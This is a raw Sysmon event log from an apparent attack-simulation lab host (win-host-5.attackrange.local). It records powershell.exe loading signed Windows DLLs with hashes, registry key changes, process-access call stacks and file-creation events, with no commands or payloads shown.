17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\e150e12dedbd1a8eb71660b9680a9ae7\mscorlib.ni.dll4.8.4311.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=CE876D73280DFF17CF3055AB7BFE5C7E,SHA256=CC5303C0076585623C02A29F009104BD8BD4FFBA9E2FB37835289F6A7B98A2EEtrueMicrosoft CorporationValid 734700x80000000000000001530530Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft 
Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 734700x80000000000000001530529Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 13241300x80000000000000001530528Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.686{21761711-83A4-607D-0100-00000000BB01}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQWORD (0x01d736d3-0xfdeca44f) 12241200x80000000000000001530527Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.686{21761711-83A4-607D-0100-00000000BB01}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll 734700x80000000000000001530526Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4311.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=2C6E4402268C1CCB8FFF2FC7F7BD27E0,SHA256=9B01E4FC480D60A22D62EFEF9857A4371C826DCE8DED10C9E89F3224EF4526E6trueMicrosoft CorporationValid 
734700x80000000000000001530525Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.686{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x80000000000000001530524Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 13241300x80000000000000001530523Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:15.670{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\JumplistData\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\WindowsPowerShell\v1.0\powershell.exeQWORD (0x01d736d3-0xfdea3e05) 12241200x80000000000000001530522Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.670{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps 12241200x80000000000000001530521Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 
17:30:15.670{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\JumplistData 10341000x80000000000000001530520Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}15722576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141a87|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530519Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}15722576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1419f2|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530518Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}15722576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+517
81 10341000x80000000000000001530517Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}15722576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1419d7|C:\Windows\System32\windows.storage.dll+1413b3|C:\Windows\System32\windows.storage.dll+141239|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530516Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}15722576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+171086|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530515Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}15722576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+171074|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530514Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}15722576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+171074|C:\Windows\System32\windows.storage.dll+14130c|C:\Windows\System32\windows.storage.dll+1410e8|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001530513Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572WIN-HOST-5\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFb314b51.TMPMD5=7EFF1DDF55D96F0016BF7AC05D7CA59D,SHA256=E8AA506D87C0E68F6486C75A720FB88EDAAEE9A75D326373BCDCB164E618A3A8falsefalse - insufficient disk space 11241100x80000000000000001530512Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFb314b51.TMP2021-04-21 17:30:15.670 734700x80000000000000001530511Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ntmarta.dll10.0.14393.0 (rs1_release.160715-1616)Windows NT MARTA providerMicrosoft® Windows® Operating SystemMicrosoft Corporationntmarta.dllMD5=854A3CAE7C97B630158C9F7EE8555970,SHA256=20F0A4D99C5095A0CAC39B816BFC987F64CD051843C79E027714666375986176trueMicrosoft WindowsValid 254200x80000000000000001530510Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZYK1OZAP5G4Y55D1150F.temp2021-04-19 12:25:37.5782021-04-21 17:30:15.670 11241100x80000000000000001530509Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZYK1OZAP5G4Y55D1150F.temp2021-04-21 17:30:15.670 734700x80000000000000001530508Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001530507Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cscapi.dll10.0.14393.0 (rs1_release.160715-1616)Offline Files Win32 APIMicrosoft® Windows® Operating 
SystemMicrosoft Corporationcscapi.dllMD5=6433F8201BFB449DC6B47F6999C2F164,SHA256=06729F1E0A0596620B48B6DC4A2CC9CC5FE55B17BD488C71F7F15AA4262C8C14trueMicrosoft WindowsValid 18141800x80000000000000001530506Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572\srvsvcC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 734700x80000000000000001530505Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 734700x80000000000000001530504Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x80000000000000001530503Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.670{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\ntshrui.dll10.0.14393.4169 (rs1_release.210107-1130)Shell extensions for sharingMicrosoft® Windows® Operating SystemMicrosoft Corporationntshrui.dllMD5=E996A5D4EA7754FF1B0411F0B1664603,SHA256=B2DA0AC549C551A2CAF0714EF3B344C33943292FB1FA9F2EEFA706B6FF18F1A2trueMicrosoft WindowsValid 
11241100x80000000000000001530502Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.667{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530501Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.666{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D79C7CD4F9B1A0C3042FB92ACC973DA9,SHA256=64FDA902DF673F0157C5387D76E9D7593F639B72EE81BD6F3133979582D8E5A2falsefalse - insufficient disk space 10341000x80000000000000001530500Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.648{21761711-83AD-607D-0C00-00000000BB01}7243060C:\Windows\system32\svchost.exe{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001530499Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
17:30:15.648{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\linkinfo.dll10.0.14393.0 (rs1_release.160715-1616)Windows Volume TrackingMicrosoft® Windows® Operating SystemMicrosoft CorporationLINKINFO.DLLMD5=4CE9B67A187310E37E535FC4165E0933,SHA256=469B33A5DDAA93D28F66AE6D6956268F6F2F09F146734D00A931FBDD1D87DE42trueMicrosoft WindowsValid 734700x80000000000000001530498Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.648{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\BCP47Langs.dll10.0.14393.2457 (rs1_release_inmarket.180822-1743)BCP47 Language ClassesMicrosoft® Windows® Operating SystemMicrosoft CorporationBCP47Lang.dllMD5=F688C2B9DD2EB56C3B0312B6380338AA,SHA256=B22DB210486D3B5F4EEB17900C5E7AA0EEFEDBB068A0C4858EFE9F8018C34628trueMicrosoft WindowsValid 734700x80000000000000001530497Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.648{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValid 734700x80000000000000001530496Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.648{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\userenv.dll10.0.14393.3986 (rs1_release.201002-1707)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=047D26DCED07A10913C3E7C3A7502BED,SHA256=143C661F79AC6BB271452A10C2A19F6B1AAAAE43B4062B6CFF173F7D8ABC40FEtrueMicrosoft WindowsValid 
734700x80000000000000001530495Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.648{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x80000000000000001530494Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\shell32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=E6D716FCDD7A5E7897267CDCED7D3EA3,SHA256=763990AA9286C3D945B6F0D617D3EB22CE88804AC3847F27A90509F813D77FD3trueMicrosoft WindowsValid 734700x80000000000000001530493Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x80000000000000001530492Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x80000000000000001530491Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x80000000000000001530490Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x80000000000000001530489Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\windows.storage.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=902EBA937960538CA5B7A586EAFE47EE,SHA256=0C5D100EFA1E51C36C0A6E4B35BFD09C3098616EE9B3E46DC49E9E1A8365A0DFtrueMicrosoft WindowsValid 734700x80000000000000001530488Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 
(rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 10341000x80000000000000001530487Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.632{21761711-83AE-607D-1600-00000000BB01}11084896C:\Windows\system32\svchost.exe{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530486Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 